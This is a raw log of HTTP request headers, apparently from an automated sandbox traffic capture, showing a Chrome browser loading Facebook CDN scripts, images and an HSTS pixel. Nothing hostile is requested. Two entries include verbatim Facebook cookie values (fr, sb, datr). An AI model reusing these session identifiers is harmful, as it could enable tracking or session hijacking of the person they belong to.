    Source: global trafficHTTP traffic detected: GET /rsrc.php/v3/yC/r/V5iPrLb12Rf.js HTTP/1.1Host: static.xx.fbcdn.netConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://www.facebook.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: scriptReferer: https://www.facebook.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /security/hsts-pixel.gif HTTP/1.1Host: facebook.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.facebook.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: fr=0EP1BYCUXVNSi8ERK..Bm-N13..AAA.0.0.Bm-N13.AWXfEaJCEFA; sb=d934Zki5Wi7DXL1gbpG7s1V5; wd=1280x907; datr=d934ZsjiAffZHUJjG80fHvH1
    Source: global trafficHTTP traffic detected: GET /rsrc.php/v3iOos4/yj/l/en_GB/kM7FcjXTwOM.js HTTP/1.1Host: static.xx.fbcdn.netConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://www.facebook.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: scriptReferer: https://www.facebook.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /rsrc.php/v3iluz4/y2/l/en_GB/MvRHUS1G-cc.js HTTP/1.1Host: static.xx.fbcdn.netConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://www.facebook.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: scriptReferer: https://www.facebook.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /rsrc.php/v3/yP/r/ZQxGeuP1tWI.png HTTP/1.1Host: static.xx.fbcdn.netConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /rsrc.php/v3ij9m4/yu/l/en_GB/GcN06huceZG.js HTTP/1.1Host: static.xx.fbcdn.netConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /rsrc.php/v3iEm34/yf/l/en_GB/M9F-Jw7q3uo.js HTTP/1.1Host: static.xx.fbcdn.netConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://www.facebook.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: scriptReferer: https://www.facebook.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /rsrc.php/v3ikpZ4/yJ/l/en_GB/GW1DkJBvUCz.js HTTP/1.1Host: static.xx.fbcdn.netConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /rsrc.php/v3/yi/r/BLqydITNHiz.js HTTP/1.1Host: static.xx.fbcdn.netConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://www.facebook.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: scriptReferer: https://www.facebook.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /rsrc.php/v3iLl54/yM/l/en_GB/uG4EfEPS4Rt.js HTTP/1.1Host: static.xx.fbcdn.netConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /rsrc.php/v3/yY/r/pRN8RJz6VlO.js HTTP/1.1Host: static.xx.fbcdn.netConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /security/hsts-pixel.gif HTTP/1.1Host: facebook.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: fr=0EP1BYCUXVNSi8ERK..Bm-N13..AAA.0.0.Bm-N13.AWXfEaJCEFA; sb=d934Zki5Wi7DXL1gbpG7s1V5; wd=1280x907; datr=d934ZsjiAffZHUJjG80fHvH1
    Source: global trafficHTTP traffic detected: GET /rsrc.php/v3iQbs4/yM/l/en_GB/5Tr2NIWNgxM.js HTTP/1.1Host: static.xx.fbcdn.netConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://www.facebook.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: scriptReferer: https://www.facebook.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /rsrc.php/v3ikJE4/yM/l/en_GB/H9hFVb-Q8_Q.js HTTP/1.1Host: static.xx.fbcdn.netConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://www.facebook.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: scriptReferer: https://www.facebook.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /rsrc.php/v3/yC/r/V5iPrLb12Rf.js HTTP/1.1Host: static.xx.fbcdn.netConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /rsrc.php/v3iOos4/yj/l/en_GB/kM7FcjXTwOM.js HTTP/1.1Host: static.xx.fbcdn.netConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /rsrc.php/v3iEm34/yf/l/en_GB/M9F-Jw7q3uo.js HTTP/1.1Host: static.xx.fbcdn.netConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /rsrc.php/v3iMyQ4/yx/l/en_GB/yUeQb7xXYnw.js HTTP/1.1Host: static.xx.fbcdn.netConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://www.facebook.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: scriptReferer: https://www.facebook.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /rsrc.php/v3/yD/r/BGMvuu7HwCF.js HTTP/1.1Host: static.xx.fbcdn.netConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://www.facebook.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: scriptReferer: https://www.facebook.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /rsrc.php/v3i6ht4/yy/l/en_GB/Td5hkdtkXX5.js HTTP/1.1Host: static.xx.fbcdn.netConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://www.facebook.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: scriptReferer: https://www.facebook.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /rsrc.php/v3/yJ/r/KO2irUskl3Y.js HTTP/1.1Host: static.xx.fbcdn.netConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://www.facebook.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: scriptReferer: https://www.facebook.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /rsrc.php/v3iluz4/y2/l/en_GB/MvRHUS1G-cc.js HTTP/1.1Host: static.xx.fbcdn.netConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /rsrc.php/v3/yi/r/BLqydITNHiz.js HTTP/1.1Host: static.xx.fbcdn.netConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /rsrc.php/v3iQbs4/yM/l/en_GB/5Tr2NIWNgxM.js HTTP/1.1Host: static.xx.fbcdn.netConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /rsrc.php/v3iH-D4/yD/l/en_GB/kIGqHY8H8ti.js HTTP/1.1Host: static.xx.fbcdn.netConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://www.facebook.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: scriptReferer: https://www.facebook.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /rsrc.php/v3/yF/r/G4oeeXLdsEE.js HTTP/1.1Host: static.xx.fbcdn.netConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://www.facebook.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: scriptReferer: https://www.facebook.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /rsrc.php/v3/yD/r/BGMvuu7HwCF.js HTTP/1.1Host: static.xx.fbcdn.netConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /rsrc.php/v3ievD4/yP/l/en_GB/-F9g11XP17c.js HTTP/1.1Host: static.xx.fbcdn.netConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://www.facebook.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: scriptReferer: https://www.facebook.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /rsrc.php/v3ikJE4/yM/l/en_GB/H9hFVb-Q8_Q.js HTTP/1.1Host: static.xx.fbcdn.netConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /rsrc.php/v3iMyQ4/yx/l/en_GB/yUeQb7xXYnw.js HTTP/1.1Host: static.xx.fbcdn.netConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /rsrc.php/v3/yW/r/ypejlg-I21y.js HTTP/1.1Host: static.xx.fbcdn.netConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://www.facebook.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: scriptReferer: https://www.facebook.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /rsrc.php/v3/y3/r/Ja35YE72DAb.js HTTP/1.1Host: static.xx.fbcdn.netConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://www.facebook.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: scriptReferer: https://www.facebook.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /rsrc.php/v3/yJ/r/KO2irUskl3Y.js HTTP/1.1Host: static.xx.fbcdn.netConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /rsrc.php/v3ivAx4/yo/l/en_GB/48NDuq1PGrS.js HTTP/1.1Host: static.xx.fbcdn.netConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://www.facebook.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: scriptReferer: https://www.facebook.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /rsrc.php/v3i6ht4/yy/l/en_GB/Td5hkdtkXX5.js HTTP/1.1Host: static.xx.fbcdn.netConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /rsrc.php/v3iwp84/yz/l/en_GB/yH3NmCM2cz1.js HTTP/1.1Host: static.xx.fbcdn.netConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://www.facebook.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: scriptReferer: https://www.facebook.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /rsrc.php/v3/yW/r/ypejlg-I21y.js HTTP/1.1Host: static.xx.fbcdn.netConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /rsrc.php/v3iPiP4/ye/l/en_GB/V4hH0O2u6X-.js HTTP/1.1Host: static.xx.fbcdn.netConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://www.facebook.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: scriptReferer: https://www.facebook.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /rsrc.php/v3/yC/r/udpNONeEc85.js HTTP/1.1Host: static.xx.fbcdn.netConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://www.facebook.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: scriptReferer: https://www.facebook.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /rsrc.php/v3imlR4/y0/l/en_GB/JAH0JDr9qF3.js HTTP/1.1Host: static.xx.fbcdn.netConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://www.facebook.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: scriptReferer: https://www.facebook.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /rsrc.php/v3iCwx4/yZ/l/en_GB/HZi4Ht9U6gq.js HTTP/1.1Host: static.xx.fbcdn.netConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://www.facebook.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: scriptReferer: https://www.facebook.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /rsrc.php/v3ievD4/yP/l/en_GB/-F9g11XP17c.js HTTP/1.1Host: static.xx.fbcdn.netConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /rsrc.php/v3/yF/r/G4oeeXLdsEE.js HTTP/1.1Host: static.xx.fbcdn.netConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /rsrc.php/v3iH-D4/yD/l/en_GB/kIGqHY8H8ti.js HTTP/1.1Host: static.xx.fbcdn.netConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /rsrc.php/v3/y3/r/Ja35YE72DAb.js HTTP/1.1Host: static.xx.fbcdn.netConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /rsrc.php/v3/yE/r/1rYlRSL7ILQ.js HTTP/1.1Host: static.xx.fbcdn.netConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://www.facebook.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: scriptReferer: https://www.facebook.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /rsrc.php/v3ivAx4/yo/l/en_GB/48NDuq1PGrS.js HTTP/1.1Host: static.xx.fbcdn.netConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /rsrc.php/v3iO_y4/y8/l/en_GB/81PfJWE3AVG.js HTTP/1.1Host: static.xx.fbcdn.netConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://www.facebook.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: scriptReferer: https://www.facebook.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
